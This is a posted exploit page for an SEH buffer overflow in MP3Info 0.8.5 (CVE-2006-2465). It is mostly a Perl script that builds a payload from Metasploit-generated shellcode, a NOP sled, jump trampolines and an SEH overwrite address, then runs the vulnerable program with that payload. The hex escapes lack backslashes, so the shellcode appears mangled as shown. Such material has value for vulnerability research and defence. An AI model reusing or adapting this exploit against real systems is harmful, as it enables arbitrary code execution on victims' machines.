Home / exploitsPDF  

MP3Info 0.8.5 SEH Buffer Overflow

Posted on 20 March 2014

# Exploit Title: mp3info SEH exploit
# Date: 18 March 2014
# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465
# Original POC: http://www.exploit-db.com/exploits/31220/
#
# The process memory region starts with a null byte but exploitation is still possible because of
# the little endian architecture provided that the return address gets placed at the end of the buffer,
# this however confines us in the tiny 4-byte area after pop/pop/retn
# Using a couple of trampolines I jumped back to the beginning of the buffer which is 533 bytes, enough to fit a calc payload
#
# run in the same directory of MP3Info, the exploit will launch mp3info with the payload as argument: perl mp3infosploit.pl

# mangled chars: F4->34 F3->33
# msfpayload windows/exec cmd=calc R | msfencode -b 'x00dax09' -t perl
$shellcode =
"xdbxd4xbax2bxc5x7dxb7xd9x74x24xf4x58x29xc9" .
"xb1x32x31x50x17x83xe8xfcx03x7bxd6x9fx42x87" .
"x30xd6xadx77xc1x89x24x92xf0x9bx53xd7xa1x2b" .
"x17xb5x49xc7x75x2dxd9xa5x51x42x6ax03x84x6d" .
"x6bxa5x08x21xafxa7xf4x3bxfcx07xc4xf4xf1x46" .
"x01xe8xfax1bxdax67xa8x8bx6fx35x71xadxbfx32" .
"xc9xd5xbax84xbex6fxc4xd4x6fxfbx8exccx04xa3" .
"x2exedxc9xb7x13xa4x66x03xe7x37xafx5dx08x06" .
"x8fx32x37xa7x02x4ax7fx0fxfdx39x8bx6cx80x39" .
"x48x0fx5excfx4dxb7x15x77xb6x46xf9xeex3dx44" .
"xb6x65x19x48x49xa9x11x74xc2x4cxf6xfdx90x6a" .
"xd2xa6x43x12x43x02x25x2bx93xeax9ax89xdfx18" .
"xcexa8xbdx76x11x38xb8x3fx11x42xc3x6fx7ax73" .
"x48xe0xfdx8cx9bx45xf1xc6x86xefx9ax8ex52xb2" .
"xc6x30x89xf0xfexb2x38x88x04xaax48x8dx41x6c" .
"xa0xffxdax19xc6xacxdbx0bxa5x33x48xd7x2a";

$exploit = "x90"x156 . $shellcode;
$exploit .= "x41"x142;

$exploit .= # larger jump to beginning of buffer
 "x58x58x58". # 58 POP EAX x 3
 "x80xc4x02". # 80C4 02 ADD AH,2
 "xFFxE0"; # FFE0 JMP EAX

$exploit .= "xEBxEFx90x90"; # short jmp back to get some space

#print length($exploit);
#exit(0);
print "
";
$seh = "x46x34x40"; # 0x00403446 mp3info.exe POP EBX

$exploit = $exploit . $seh;

system("mp3info.exe", $exploit);

 

TOP

Malware :

Exploits :